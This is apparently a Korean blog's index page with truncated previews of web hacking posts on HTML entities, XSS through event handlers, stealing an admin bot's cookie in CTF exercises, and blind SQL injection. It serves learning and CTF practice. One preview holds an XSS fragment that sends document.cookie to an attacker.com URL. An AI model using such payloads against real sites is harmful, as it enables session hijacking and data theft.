ser-ser 님의 블로그

HTML Entity란?HTML Entity는 특수 문자나 기호를 HTML 문서에서 표시하기 위한 코드입니다 HTML에서는 ,&등의 문자는 태그나 HTML 구조를 나타내는 데 사용되기 때문에, 이를 문자 그대로 출력하려면 HTML Entity변환해야 합니다HTML Entity 사용하는 이유:  브라우저에서 특수 문자를 정확히 렌더링및 언어별 기호나 유니코드 문자를 HTML에서 표시하기 위해서 사용합니다 HTML Entity 특징: HTML Entity는 &로 시작하고, 특정 코드나 이름 뒤에 ;를 붙여 사용합니다 EX> < →   일반문자열에서는 반응이 없지만   특수문자를 삽입하면 값입 변환되어 출력되는 것을 확인 할 수 있습니다  문자Entity 이름10진수 코드16진수 코드<<&#..

웹 해킹의 개념 2024. 12. 31. 13:24

이벤트 핸들러가 실행되는 곳에서 사용자 입력값을 신뢰하고 이를 적절히 검증하거나 필터링하지 않을 경우 XSS의 공격에 노출이 될 위험이 높습니다Event Handler가 XSS 공격에 취약한 이유HTML 태그의 이벤트 속성은 자바스크립트 코드를 직접 실행할 수 있습니다웹 애플리케이션이 사용자 입력을 받아 HTML에 그대로 렌더링 하면, XSS 공격에 노출이 됩니다onerror 이미지 로딩 실패 시 실행되는 이벤트 핸들러를 악용 활용 방법:  잘못된 이미지 경로를 의도적으로 사용해 에러를 유발했으며 데이터 유출 코드 작성 https://attacker.com?cookie=' + document.cookie);">  onclick클릭 이벤트 악용 다음활용 방법: 사용자가 클릭하면 데이터를 수집 및 리다이렉트..

웹 해킹의 개념 2024. 12. 29. 15:53

이전 9주 차 CTF에서 스크립트를 띄우는 취약점을 찾아냈다면 이제는 그것을 바탕으로 관리자봇의 쿠키를 탈취하는 과정을 알아가 보도록 하겠습니다XSS 1취약점 지점에서 악의적인 코드를 삽입하여 stored XSS 공격기법 활용하여 쿠키를 탈취하도록 하겠습니다   입력값을 올바르게 입력했음에도 불과하고 쿠키값이 나오지 않고 있는 것으로 보입니다.... 어찌 된 일인지 모르겠네요...중간에 alert(1) 값을 넣고 앞전 코드가 인식이 됐는지 확인해보도록 하겠습니다     alert(1)이 잘 출력되는 것을 보아 스크립트 자체는 잘 실행되는 것을 확인할 수 있습니다.....일단 해당 url을 인코딩해보겠습니다"/> 인코딩 된 url 더보기http://ctf.segfaulthub.com:4343/xss_3/m..

CTF 2024. 12. 27. 12:27

이전 글에서 XSS를 사용하여 취약점을 발견하고 alert 또는 prompt를 사용하여 스크립트창을 띄우는 시도까지진행했습니다 이어서 이런 취약점으로 어떤 다양한 공격이 가능한지 알아보도록 하겠습니다XSS가 통하는 허점을 발견했으면 그것을 활용하여 가장 먼저 해야 될 것이 대상자의 쿠키값 탈취이며 더 다양한공격 기법으로 key logger로 대상자의 아이디 및 비밀번호까지 탈취할 수 있습니다CTF XSS 1의 XSS 취약점을 바탕으로 쿠키값을 탈취해보도록 하겠습니다일단 시작하기 앞서 관리자봇의 쿠키값을 수신받을 수 있는 서버를 하나 생성해야 합니다 저는 pipedream 사이트에서 서버 링크를 발급받도록 하겠습니다 해당 사이트는 XSS 공격으로 전송된 값을 웹 인터페이스에서쉽게 확인 가능하며 XSS 테스..

웹 해킹의 개념 2024. 12. 21. 12:43

XSS 1 해당 실습 페이지에 접속하여 XSS 취약점 여부와 전체적인 구조를 확인해 보겠습니다.게시판으로 이동해 글을 작성한 뒤, 홈으로 나와 작성한 게시글이 표시되는지 확인했습니다.Burp Suite를 통해 요청과 응답을 분석해 보니 닉네임과 제목이 HTML로 출력되는 것을 확인했습니다. 이를 통해 특수문자를 입력해 Stored XSS가 가능한지 테스트하겠습니다.  특수문자를 입력한 결과, 초록색 박스에서 특수문자 출력값이 인코딩 처리되어 꺾쇠()를 사용할 수 없게 되어 있음을 확인했습니다.그렇다면, 해당 게시글을 클릭하여 자세히 살펴보겠습니다.   게시글을 클릭하니 제목 부분에서는 특수문자가 제대로 출력되지만, 내용 부분에서는 여전히 인코딩 처리가 되어 있음을 확인했습니다.이번에는 제목에 스크립트를 ..

CTF 2024. 12. 15. 12:21

XSS (Cross-Site Scripting)웹사이트에 악성 스크립트를 주입하여 사용자의 데이터를 탈취하거나, 피해를 입히는 공격입니다. XSS를 레스토랑으로 비유해 이해하기웹사이트를 레스토랑으로 생각해보겠습니다.레스토랑(웹사이트)은 손님(사용자)에게 맛있는 음식을 제공하고, 손님은 이를 믿고 먹습니다.어느 날 악의적인 사람(해커)이 주방장에게 몰래 유독한 재료(악성 스크립트)를 전달하여 요리에 넣게 만듭니다.주방장은 유독한 재료를 정상적인 음식(HTML 콘텐츠)처럼 생각하고 손님에게 내놓습니다.손님(사용자)은 아무것도 모르고 음식을 먹고 피해를 입습니다.이렇게 비유하니 XSS가 조금 더 쉽게 이해되지 않으신가요?이어서 XSS 공격의 목표와 종류를 알아보겠습니다.XSS 공격의 목표사용자의 민감한 데이터..

웹 해킹의 개념 2024. 12. 12. 19:46

SQL Injection Point 1제공된 사이트에 접속하여 flag 및 모든 데이터를 찾아보겠습니다 user 구문에 약간의 SQL 문법을 주입했더니 아래와 같은 반응이 확인되었습니다  placeholder 부분에 있던 문자열 "Nothing Here..."이 없어지는 모습을 확인할 수 있었습니다 이렇게참/거짓을 증명하는 단서를 찾았으니 이 단서를 이용하여 데이터를 추출해보도록 합시다blind SQL injection을 사용하여 데이터를 추출해보았습니다데이터 추출DB 이름: sqli_6테이블 이름boardflag_tablemember칼럼 확인board:username, title, views, date, time, content, id, likes, likes_count, fileflag_table:i..

CTF 2024. 12. 10. 18:24

SQL Injection 공격 포인트 찾기SQL Injection 공격을 수행하려면 기본적으로 서버가 파라미터를 입력받아 이를 화면에 출력하도록 처리하는 경우 해당 데이터에 악의적인 SQL 문법을 삽입해야 합니다 하지만 이러한 공격 포인트를 찾는 것은 여간 쉽지 않습니다오늘은 SQLinjection의 point를 찾아 인젝션 공격을 가능하게끔 찾는 과정을 담아내겠습니다SQL Injection의 취약점이 흔히 발견되는 지점사이트 내에서 SQL Injection 취약점이 주로 발견되는 위치는 다음과 같습니다쿠키(Cookie) : 클라이언트와 서버 간 교환되는 데이터테이블(Table) : 동적으로 생성되는 데이터베이스 테이블 구조칼럼(Column) : 쿼리의 일부로 사용되는 열 이름ORDER BY : 정렬 기..

웹 해킹의 개념 2024. 12. 6. 18:54